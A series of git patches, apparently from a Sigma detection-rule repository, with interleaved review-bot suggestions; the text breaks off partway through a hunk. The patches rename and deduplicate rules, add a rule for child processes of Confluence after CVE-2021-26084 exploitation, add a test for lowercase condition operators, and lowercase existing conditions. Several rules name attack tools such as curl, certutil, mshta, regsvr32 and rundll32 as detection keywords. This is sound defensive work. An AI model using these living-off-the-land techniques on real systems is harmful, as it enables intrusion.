@@ -1,4 +1,4 @@ -title: Created Executables and Files by Office Applications +title: Created Files by Office Applications id: c7a74c80-ba5a-486e-9974-ab9e682bc5e4 description: This rule will monitor executable and script file creation by office applications. Please add more file extentions or magic bytes to the logic of your choice. references: From 5547d274a0202aa27ad570b4471f68abb32894cc Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:41:56 -0600 Subject: [PATCH 0846/1367] Changed Title title: New LOLBin Process by Office Applications --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 49245266..1a2a1ef6 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: Created Executables and Files by Office Applications +title: New LOLBin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From 44e39ec3ac3a6540fe174e313270a72fd425db9f Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:43:35 -0600 Subject: [PATCH 0847/1367] Changed title changed title to stay within rule guideline --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) 
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 1a2a1ef6..32f406ae 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: New LOLBin Process by Office Applications +title: New Lolbin Process by Office Applications id: 23daeb52-e6eb-493c-8607-c4f0246cb7d8 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From a3a12375b51fdad40fe38a61c4feb5ccf4bebf7b Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:51:22 -0600 Subject: [PATCH 0848/1367] changed title title: Lolbins Process Created With Office Application --- ...Monitor_LOLBins_Process_Creations_by_Office_applications.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index d6039599..cbeb23f7 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -1,4 +1,4 @@ -title: LOLBins Process Created With Office Application +title: Lolbins Process Created With Office Application id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. references: From 361121c4027426b453637a3baa6e174e4c07d274 Mon Sep 17 00:00:00 2001 
From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 21:51:49 -0600 Subject: [PATCH 0849/1367] changed title title: Lolbins Process Created With WmiPrvSE --- ...r_LOLBins_process_creations_with_Wmiprvse_parent_process.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml index 69368182..d456c86b 100644 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml @@ -1,4 +1,4 @@ -title: LOLBins Process Created With WmiPrvSE +title: Lolbins Process Created With WmiPrvSE id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. references: From 91081a7fbc6df9cbdbadb5973040e23c0cd1a751 Mon Sep 17 00:00:00 2001 From: Bhabesh Rai Date: Fri, 10 Sep 2021 10:04:16 +0545 Subject: [PATCH 0850/1367] Added rule for Atlassian Confluence CVE-2021-26084 --- ...sian_confluence_cve_2021_26084_exploit.yml | 34 +++++++++++++++++++ 1 file changed, 34 insertions(+) create mode 100644 rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml new file mode 100644 index 00000000..4099a09d --- /dev/null +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml 
@@ -0,0 +1,34 @@ +title: Atlassian Confluence CVE-2021-26084 +id: 245f92e3-c4da-45f1-9070-bc552e06db11 +status: experimental +description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 +author: Bhabesh Raj +date: 2021/09/08 +references: + - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 + - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html + - https://github.com/h3v0x/CVE-2021-26084_Confluence +falsepositives: + - Unknown +level: high +logsource: + category: process_creation + product: windows +detection: + selection: + # Monitor suspicious child processes spawned by Confluence + ParentImage|endswith: '\Atlassian\Confluence\jre\bin\java.exe' + CommandLine|contains: + - 'cmd /c' + - 'cmd /k' + - 'powershell' + - 'certutil' + - 'curl' + - 'whoami' + - 'ipconfig' + condition: selection \ No newline at end of file From 0806e4ccd28271f628e5579965be1ec6dffbf5ff Mon Sep 17 00:00:00 2001 From: Sittikorn S <61369934+BlackB0lt@users.noreply.github.com> Date: Fri, 10 Sep 2021 11:30:51 +0700 Subject: [PATCH 0851/1367] Update web_cve_2021_40539_manageengine_adselfservice_exploit.yml --- .../web_cve_2021_40539_manageengine_adselfservice_exploit.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml index 1f049dbf..a0ff44c9 100644 --- a/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml +++ b/rules/web/web_cve_2021_40539_manageengine_adselfservice_exploit.yml @@ -11,6 +11,7 @@ tags: - attack.initial_access - attack.t1190 logsource: + product: zoho_manageengine category: webserver definition: 'Must be collect log from \ManageEngine\ADSelfService Plus\logs' detection: 
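Review bot: `CommandLine|contains: 'cmd /c'` and `'cmd /k'` miss the equally common `cmd.exe /c` form, and bare substrings such as `'curl'` and `'whoami'` match any command line containing those letters; matching the child `Image|endswith` (`\cmd.exe`, `\powershell.exe`, `\certutil.exe`, `\curl.exe`, `\whoami.exe`, `\ipconfig.exe`) would be both more precise and harder to evade than command-line text. `ParentImage|endswith: '\Atlassian\Confluence\jre\bin\java.exe'` assumes the default install path and the bundled JRE, so a custom install directory or an external JRE is missed; `ParentImage|contains: '\Atlassian\Confluence\'` combined with `ParentImage|endswith: '\java.exe'` covers more deployments. The file is also committed without a trailing newline, which the later style patch corrects.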
From 4af244b1354328033f507c821675ac8357e76801 Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 23:08:52 -0600 Subject: [PATCH 0852/1367] Duplicate Rule Removed rule as it was duplicated --- ...creations_with_Wmiprvse_parent_process.yml | 33 ------------------- 1 file changed, 33 deletions(-) delete mode 100644 rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml b/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml deleted file mode 100644 index d456c86b..00000000 --- a/rules/windows/sysmon/Monitor_LOLBins_process_creations_with_Wmiprvse_parent_process.yml +++ /dev/null @@ -1,33 +0,0 @@ -title: Lolbins Process Created With WmiPrvSE -id: 59447a89-5ba1-44ac-9d48-1c620a53cd0b -description: This rule will monitor LOLBin process creations by wmiprvse. Add more LOLBins to rule logic if needed. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defense_evasion -status: experimental -date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: \wbem\WmiPrvSE.exe - condition: selection1 and selection2 -falsepositives: - - FPs are possible here, but some LOLBins weren't excluded for obvious reasons. -level: high 
From f4155010ff1f18114bed95a6fb3b942e5acc52bd Mon Sep 17 00:00:00 2001 From: Cyb3rEng <88643791+Cyb3rEng@users.noreply.github.com> Date: Thu, 9 Sep 2021 23:09:20 -0600 Subject: [PATCH 0853/1367] Duplicate Rule Removed rule as it was duplicated --- ...ocess_Creations_by_Office_applications.yml | 36 ------------------- 1 file changed, 36 deletions(-) delete mode 100644 rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml diff --git a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml deleted file mode 100644 index cbeb23f7..00000000 --- a/rules/windows/sysmon/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ /dev/null @@ -1,36 +0,0 @@ -title: Lolbins Process Created With Office Application -id: b45e1519-5de5-4dfe-bef6-73bc48c2b983 -description: This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated. -references: - - https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/ - - https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/main/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml -author: "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)" -tags: - - attack.t1204.002 - - attack.t1047 - - attack.t1218.010 - - attack.execution - - attack.defense_evasion -status: experimental -date: 2021/08/23 -logsource: - product: Windows - category: process_creation -detection: - #useful_information: add more LOLBins to the rules logic of your choice. - selection1: - Image|endswith: - - 'regsvr32' - - 'rundll32' - - 'msiexec' - - 'mshta' - - 'verclsid' - selection2: - ParentImage|endswith: - - winword.exe - - excel.exe - - powerpnt.exe - condition: selection1 AND selection2 -falsepositives: - - Unknown -level: high From 0b5e8cb980e7f99fac0814c9920905d6a2e66b0e Mon Sep 17 00:00:00 2001 
From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 10 Sep 2021 07:52:35 +0200 Subject: [PATCH 0854/1367] Update lnx_auditd_hidden_zip_files_steganography.yml Formatting changes --- .../auditd/lnx_auditd_hidden_zip_files_steganography.yml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml index 77836ffd..4fa1edb4 100644 --- a/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_hidden_zip_files_steganography.yml @@ -21,8 +21,9 @@ detection: type: EXECVE a0: cat a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' + a1|endswith: + - '.jpg' + - '.png' a2: a2|endswith: '.zip' condition: commands and a1 and a2 From a4dffc14d44d8031e8b8c210408f5574a1399e58 Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Fri, 10 Sep 2021 07:54:56 +0200 Subject: [PATCH 0855/1367] Update lnx_auditd_unzip_hidden_zip_files_steganography.yml Fixing formatting --- .../lnx_auditd_unzip_hidden_zip_files_steganography.yml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml index de87660b..ee5b62e6 100644 --- a/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml +++ b/rules/linux/auditd/lnx_auditd_unzip_hidden_zip_files_steganography.yml @@ -22,6 +22,7 @@ detection: a0: - unzip a1: - - a1|endswith: '.jpg' - - a1|endswith: '.png' - condition: commands and a1 \ No newline at end of file + a1|endswith: + - '.jpg' + - '.png' + condition: commands and a1 From 3d147f528fe1ac66c9dcd4d87d2bbd7db1e811f9 Mon Sep 17 00:00:00 2001 
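Review bot: In the first hunk, `a1|endswith` with `'.jpg'` and `'.png'` is case-sensitive in most backends and omits `.jpeg`, so `photo.JPG` or `photo.jpeg` carrying an appended archive is not caught; add `- '.jpeg'` and, if the backend does not fold case, upper-case variants. `a0: cat` is an exact match on argv[0], and I believe auditd records it as typed, so an invocation as `/bin/cat` would presumably not match; consider `a0|endswith: '/cat'` alongside the bare form. The `condition` line and the rest of the rule sit outside the hunk.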
From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 10 Sep 2021 09:23:00 +0200 Subject: [PATCH 0856/1367] Rename Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml to process_creation_command_execution_by_office_applications.yml --- ...process_creation_command_execution_by_office_applications.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml => process_creation_command_execution_by_office_applications.yml} (100%) diff --git a/rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml similarity index 100% rename from rules/windows/process_creation/Monitor_WMI_Win32_Process Create_command_execution_by_Office_Applications.yml rename to rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml From 59b9902502cfe746bfc04128e15b722e7aa1f3ca Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 09:33:09 +0200 Subject: [PATCH 0857/1367] style: fixed indentation level --- ...lassian_confluence_cve_2021_26084_exploit.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index 4099a09d..587ea7d7 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml 
@@ -24,11 +24,11 @@ detection: # Monitor suspicious child processes spawned by Confluence ParentImage|endswith: '\Atlassian\Confluence\jre\bin\java.exe' CommandLine|contains: - - 'cmd /c' - - 'cmd /k' - - 'powershell' - - 'certutil' - - 'curl' - - 'whoami' - - 'ipconfig' - condition: selection \ No newline at end of file + - 'cmd /c' + - 'cmd /k' + - 'powershell' + - 'certutil' + - 'curl' + - 'whoami' + - 'ipconfig' + condition: selection From 3824a12323338fe21e5d3d41ed65469be887c645 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Fri, 10 Sep 2021 09:33:52 +0200 Subject: [PATCH 0858/1367] style: fixed indentation level, order of fields --- ...lassian_confluence_cve_2021_26084_exploit.yml | 16 ++++++++-------- 1 file changed, 8 insertions(+), 8 deletions(-) diff --git a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml index 587ea7d7..d69b708b 100644 --- a/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml +++ b/rules/windows/process_creation/sysmon_atlassian_confluence_cve_2021_26084_exploit.yml @@ -2,20 +2,17 @@ title: Atlassian Confluence CVE-2021-26084 id: 245f92e3-c4da-45f1-9070-bc552e06db11 status: experimental description: Detects spawing of suspicious child processes by Atlassian Confluence server which may indicate successful exploitation of CVE-2021-26084 -tags: - - attack.initial_access - - attack.execution - - attack.t1190 - - attack.t1059 author: Bhabesh Raj date: 2021/09/08 references: - https://nvd.nist.gov/vuln/detail/CVE-2021-26084 - https://confluence.atlassian.com/doc/confluence-security-advisory-2021-08-25-1077906215.html - https://github.com/h3v0x/CVE-2021-26084_Confluence -falsepositives: - - Unknown -level: high +tags: + - attack.initial_access + - attack.execution + - attack.t1190 + - attack.t1059 logsource: category: process_creation product: windows 
@@ -32,3 +29,6 @@ detection: - 'whoami' - 'ipconfig' condition: selection +falsepositives: + - Unknown +level: high From fe035388f0aa55f049a15f5e7e0080a35522745f Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 10 Sep 2021 10:02:19 +0200 Subject: [PATCH 0859/1367] Rename Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml to process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml --- ...ce_application_from_proxy_executing_regsvr32_with_payload.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml => process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml} (100%) diff --git a/rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml similarity index 100% rename from rules/windows/process_creation/Monitor_Office_Application_from_proxy executing_regsvr32_with_payload.yml rename to rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml From 97cd368064c67074f8b4948e001dd8f8a6f09249 Mon Sep 17 00:00:00 2001 From: frack113 Date: Fri, 10 Sep 2021 13:33:16 +0200 Subject: [PATCH 0860/1367] update test_rules.py --- tests/test_rules.py | 31 +++++++++++++++++++++++++++---- 1 file changed, 27 insertions(+), 4 deletions(-) diff --git a/tests/test_rules.py b/tests/test_rules.py index ce92d132..9cfd82c0 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -39,7 +39,7 @@ class TestRules(unittest.TestCase): def get_rule_yaml(self, file_path:str) -> dict: data = [] - with open(file_path) as f: + with open(file_path,encoding='utf-8') as f: yaml_parts = yaml.safe_load_all(f) for part in yaml_parts: data.append(part) 
@@ -64,7 +64,7 @@ class TestRules(unittest.TestCase): files_with_legal_issues = [] for file in self.yield_next_rule_file_path(self.path_to_rules): - with open(file, 'r') as fh: + with open(file, 'r',encoding='utf-8') as fh: file_data = fh.read() for tm in self.TRADE_MARKS: if tm in file_data: @@ -245,7 +245,7 @@ class TestRules(unittest.TestCase): def test_event_id_instead_of_process_creation(self): faulty_detections = [] for file in self.yield_next_rule_file_path(self.path_to_rules): - with open(file) as f: + with open(file,encoding='utf-8') as f: for line in f: if re.search(r'.*EventID: (?:1|4688)\s*$', line) and file not in faulty_detections: faulty_detections.append(file) @@ -310,7 +310,7 @@ class TestRules(unittest.TestCase): logsource = self.get_rule_part(file_path=file, part_name="logsource") service = logsource.get('service', '') if service.lower() == 'sysmon': - with open(file) as f: + with open(file,encoding='utf-8') as f: found = False for line in f: if re.search(r'.*EventID:.*$', line): # might be on a single line or in multiple lines 
@@ -620,6 +620,29 @@ class TestRules(unittest.TestCase): self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using list with only 1 element") + def test_condition_operator_casesensitive(self): + faulty_rules = [] + for file in self.yield_next_rule_file_path(self.path_to_rules): + detection = self.get_rule_part(file_path=file, part_name="detection") + if detection: + valid = True + if isinstance(detection["condition"],str): + param = detection["condition"].split(' ') + for item in param: + if item.lower() == 'or' and not item == 'or': + valid = False + elif item.lower() == 'and' and not item == 'and': + valid = False + elif item.lower() == 'not' and not item == 'not': + valid = False + elif item.lower() == 'of' and not item == 'of': + valid = False + if not valid: + print(Fore.RED + "Rule {} has a invalid condition '{}' : 'or','and','not','of' are lowercase".format(file,detection["condition"])) + faulty_rules.append(file) + + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules using condition whitout lowercase operator") + def get_mitre_data(): """ Generate tags from live TAXI service to get up-to-date data From 0288f5b626af609cc99b762d3f074ff86837c942 Mon Sep 17 00:00:00 2001 
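Review bot: `test_condition_operator_casesensitive` tokenizes the condition with `split(' ')` and compares whole tokens, so an operator separated by a tab or a double space, or glued to a parenthesis as in `NOT(filter)` or `OR(`, is never checked; splitting on `\s+` and stripping `()` from each token closes both gaps, and the four identical `elif` branches collapse into one membership test (rewrite below). `re` is already used by this file in the earlier hunks (`re.search`), so no new import is needed. The two messages also carry typos: `a invalid` → `an invalid` and `whitout` → `without`. The enclosing class `TestRules` starts outside the hunk.
```python
                if isinstance(detection["condition"], str):
                    # operators may be separated by any whitespace or touch a parenthesis
                    for item in re.split(r'\s+', detection["condition"].strip()):
                        word = item.strip('()')
                        if word.lower() in ('or', 'and', 'not', 'of') and word != word.lower():
                            valid = False
                if not valid:
                    print(Fore.RED + "Rule {} has an invalid condition '{}' : 'or','and','not','of' are lowercase".format(file, detection["condition"]))
                    faulty_rules.append(file)
        # … unchanged: assertEqual with the summary message …
```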
From: frack113 Date: Fri, 10 Sep 2021 13:51:52 +0200 Subject: [PATCH 0861/1367] fix condition operator case --- rules/cloud/aws/aws_root_account_usage.yml | 2 +- ...k_http_executable_download_from_webdav.yml | 2 +- .../builtin/win_metasploit_authentication.yml | 2 +- .../builtin/win_possible_dc_shadow.yml | 2 +- .../sysmon_suspicious_remote_thread.yml | 2 +- ...ocess_Creations_by_Office_applications.yml | 2 +- ...Applications_Spawning_WMI_command-line.yml | 2 +- ...ice_applications_using_file_extentions.yml | 2 +- ...mmand_execution_by_office_applications.yml | 2 +- ..._proxy_executing_regsvr32_with_payload.yml | 2 +- .../process_creation/win_nltest_recon.yml | 2 +- .../sysmon_asep_reg_keys_modification.yml | 26 +++++++++---------- ..._proxy_executing_regsvr32_with_payload.yml | 2 +- ...ice_applications_using_file_extentions.yml | 2 +- ...Applications_Spawning_WMI_command-line.yml | 2 +- 15 files changed, 27 insertions(+), 27 deletions(-) diff --git a/rules/cloud/aws/aws_root_account_usage.yml b/rules/cloud/aws/aws_root_account_usage.yml index e278996f..62aaafbd 100644 --- a/rules/cloud/aws/aws_root_account_usage.yml +++ b/rules/cloud/aws/aws_root_account_usage.yml @@ -14,7 +14,7 @@ detection: userIdentity.type: Root selection_eventtype: eventType: AwsServiceEvent - condition: selection_usertype AND NOT selection_eventtype + condition: selection_usertype and not selection_eventtype falsepositives: - AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html level: medium diff --git a/rules/network/zeek/zeek_http_executable_download_from_webdav.yml b/rules/network/zeek/zeek_http_executable_download_from_webdav.yml index 9fe20755..5674e70d 100644 --- a/rules/network/zeek/zeek_http_executable_download_from_webdav.yml +++ b/rules/network/zeek/zeek_http_executable_download_from_webdav.yml 
@@ -20,7 +20,7 @@ detection: selection_executable: - resp_mime_types|contains: 'dosexec' - c-uri|endswith: '.exe' - condition: selection_webdav AND selection_executable + condition: selection_webdav and selection_executable falsepositives: - unknown level: medium diff --git a/rules/windows/builtin/win_metasploit_authentication.yml b/rules/windows/builtin/win_metasploit_authentication.yml index 04b0db2a..d2b25678 100644 --- a/rules/windows/builtin/win_metasploit_authentication.yml +++ b/rules/windows/builtin/win_metasploit_authentication.yml @@ -25,7 +25,7 @@ detection: ProcessName: EventID: 4776 Workstation|re: '^[A-Za-z0-9]{16}$' - condition: selection1 OR selection2 + condition: selection1 or selection2 falsepositives: - Linux hostnames composed of 16 characters. level: high diff --git a/rules/windows/builtin/win_possible_dc_shadow.yml b/rules/windows/builtin/win_possible_dc_shadow.yml index bec226cf..4246d489 100644 --- a/rules/windows/builtin/win_possible_dc_shadow.yml +++ b/rules/windows/builtin/win_possible_dc_shadow.yml @@ -24,7 +24,7 @@ detection: EventID: 5136 AttributeLDAPDisplayName: servicePrincipalName AttributeValue|startswith: 'GC/' - condition: selection1 OR selection2 + condition: selection1 or selection2 falsepositives: - Exclude known DCs level: high diff --git a/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml b/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml index e8bf963f..1fe95497 100644 --- a/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml +++ b/rules/windows/create_remote_thread/sysmon_suspicious_remote_thread.yml @@ -72,7 +72,7 @@ detection: - '\wscript.exe' filter: SourceImage|contains: 'Visual Studio' - condition: selection AND NOT filter + condition: selection and not filter fields: - ComputerName - User 
diff --git a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml index 32f406ae..4f887b91 100644 --- a/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml +++ b/rules/windows/process_creation/Monitor_LOLBins_Process_Creations_by_Office_applications.yml @@ -30,7 +30,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml index 3963f86e..2fceff74 100644 --- a/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml +++ b/rules/windows/process_creation/Monitor_Office_Applications_Spawning_WMI_command-line.yml @@ -26,7 +26,7 @@ detection: - winword.exe - excel.exe - powerpnt.exe - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml index 28f02620..1bef4b39 100644 --- a/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml +++ b/rules/windows/process_creation/Monitor_executable_and_script_files_creation_by_Office_applications_using_file_extentions.yml @@ -38,7 +38,7 @@ detection: selection3: FileMagicBytes|startswith: - "4D5A" - condition: selection1 AND (selection2 OR selection3) + condition: selection1 and (selection2 or selection3) falsepositives: - Unknown level: high 
diff --git a/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml index 079c49ac..19133d21 100644 --- a/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml +++ b/rules/windows/process_creation/process_creation_command_execution_by_office_applications.yml @@ -27,7 +27,7 @@ detection: - '\winword.exe' - '\excel.exe' - '\powerpnt.exe' - condition: selection1 AND selection2 + condition: selection1 and selection2 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml index eabcf9c8..2fcacee8 100644 --- a/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml +++ b/rules/windows/process_creation/process_creation_office_application_from_proxy_executing_regsvr32_with_payload.yml @@ -38,7 +38,7 @@ detection: - 'process' - 'create' - 'call' - condition: selection1 AND selection2 AND selection3 AND selection4 + condition: selection1 and selection2 and selection3 and selection4 falsepositives: - Unknown level: high diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index 720cc587..46985f8e 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -31,7 +31,7 @@ detection: - '/parentdomain' - '/domain_trusts' - '/user' - condition: selection_nltest AND (selection_recon1 OR selection_recon2) + condition: selection_nltest and (selection_recon1 or selection_recon2) falsepositives: - Legitimate administration use but user must be check out level: medium 
diff --git a/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml b/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml index a8bb54d7..cac8f9e7 100755 --- a/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml +++ b/rules/windows/registry_event/sysmon_asep_reg_keys_modification.yml @@ -190,19 +190,19 @@ detection: - '\Lsa\Notification Packages' - '\Lsa\Authentication Packages' - '\BootVerificationProgram\ImagePath' - condition: main_selection OR - session_manager_base AND session_manager OR - current_version_base AND current_version OR - nt_current_version_base AND nt_current_version OR - wow_current_version_base AND wow_current_version OR - wow_nt_current_version_base AND wow_nt_current_version OR - (wow_office OR office) AND wow_office_details OR - (wow_ie OR ie) AND wow_ie_details OR - wow_classes_base AND wow_classes OR - classes_base AND classes OR - scripts_base AND scripts OR - winsock_parameters_base AND winsock_parameters OR - system_control_base AND system_control + condition: main_selection or + session_manager_base and session_manager or + current_version_base and current_version or + nt_current_version_base and nt_current_version or + wow_current_version_base and 